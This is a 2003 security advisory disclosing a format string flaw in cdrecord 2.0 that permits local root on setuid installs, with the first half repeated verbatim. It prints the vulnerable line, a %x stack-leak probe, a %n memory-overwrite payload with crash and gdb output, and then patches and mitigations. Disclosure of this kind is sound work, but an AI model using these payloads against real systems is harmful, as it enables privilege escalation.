------------------------------------------------------------------------
----
PACKAGE : cdrtools
VERSION : 2.0
SUMMARY : Format String
SEVERITY : local root exploit if suid (on several distros)
DATE: : 2003-05-05
------------------------------------------------------------------------
----
Hi,
i would inform you that there is a format string vulnerability
in cdrecord 2.0 and in particular in libscg/scsiopen.c in line 273, i
suppose:
--------------------------------------------------------------
271 if (scg__open(scgp, devname) <= 0) {
272 if (errs && scgp->errstr)
>>>273 js_snprintf(errs, slen, scgp->errstr);<<<<
274 scg_sfree(scgp);
275 return ((SCSI *)0);
276 }
_______________________________________________________
!------- W A R N I N G -----------!
!--- this is an exploitable vulnerability! ---!
!----------------------------------------------!
Cdrecord is present in several distros as setuid program so this is a real
security hole.
e.g.
$ ./cdrecord dev="AAAA|%x%x%x%x%x%x%x%x%x%x%x" int.c
Cdrecord 2.0 (i586-pc-linux-gnu) Copyright (C) 1995-2002 Jrg Schilling
scsidev: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
devname: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
scsibus: -2 target: -2 lun: -2
Warning: Open by 'devname' is unintentional and not supported.
./cdrecord: File o directory inesistente. Cannot open
'AAAABBBBCCCC|65bffff6743808b7c8ffffffff000fffffffe4141414142424242.
Cannot open SCSI driver.
./cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you
are root.
as you can see th last %x refers to AAAABBBBCCC so i can use %n for
overwriting. anything i want:
e.g. i can find on the stack the location of the return address...
let's say 0xbffcffcc:
$./cdrecord dev=`printf
"\xec\xed\xff\xbfBBBBCCCC|%%x%%x%%x%%x%%x%%x%%x%%x%%n"`
c/int.c
.....snip....
(core dump)
$ gdb `which cdrecord` core -q
....snip...
#0 0x3f in ?? ()
(gdb) bt
#0 0x3f in ?? ()
#1 0x8065451 in scg_open ()
#2 0x8049a3b in main ()
...
------------------------------------------------------------------------
----
PACKAGE : cdrtools
VERSION : 2.0
SUMMARY : Format String
SEVERITY : local root exploit if suid (on several distros)
DATE: : 2003-05-05
------------------------------------------------------------------------
----
Hi,
i would inform you that there is a format string vulnerability
in cdrecord 2.0 and in particular in libscg/scsiopen.c in line 273, i
suppose:
--------------------------------------------------------------
271 if (scg__open(scgp, devname) <= 0) {
272 if (errs && scgp->errstr)
>>>273 js_snprintf(errs, slen, scgp->errstr);<<<<
274 scg_sfree(scgp);
275 return ((SCSI *)0);
276 }
_______________________________________________________
!------- W A R N I N G -----------!
!--- this is an exploitable vulnerability! ---!
!----------------------------------------------!
Cdrecord is present in several distros as setuid program so this is a real
security hole.
e.g.
$ ./cdrecord dev="AAAA|%x%x%x%x%x%x%x%x%x%x%x" int.c
Cdrecord 2.0 (i586-pc-linux-gnu) Copyright (C) 1995-2002 Jrg Schilling
scsidev: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
devname: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
scsibus: -2 target: -2 lun: -2
Warning: Open by 'devname' is unintentional and not supported.
./cdrecord: File o directory inesistente. Cannot open
'AAAABBBBCCCC|65bffff6743808b7c8ffffffff000fffffffe4141414142424242.
Cannot open SCSI driver.
./cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you
are root.
as you can see th last %x refers to AAAABBBBCCC so i can use %n for
overwriting. anything i want:
e.g. i can find on the stack the location of the return address...
let's say 0xbffcffcc:
$./cdrecord dev=`printf
"\xec\xed\xff\xbfBBBBCCCC|%%x%%x%%x%%x%%x%%x%%x%%x%%n"`
c/int.c
.....snip....
(core dump)
$ gdb `which cdrecord` core -q
....snip...
#0 0x3f in ?? ()
(gdb) bt
#0 0x3f in ?? ()
#1 0x8065451 in scg_open ()
#2 0x8049a3b in main ()
...
so it's exploitable.
Solutions:
A. Updated package can be found on:
ftp://ftp.berlios.de/pub/cdrecord/alpha/cdrtools-2.01a14.tar.gz
B. Replace line 273 of liscg/scsiopen.c with :
js_snprintf(errs, slen, "%s", scgp->errstr);
C. remove the suid bit with:
chmod 755 `which cdrecord`
Regards,
Stefano Di Paola
------------------
Stefano Di Paola
Software Engineer
stefano.dipaola1<at>tin<dot>it
st0r1e<at>libero<dot>com
[ reply ]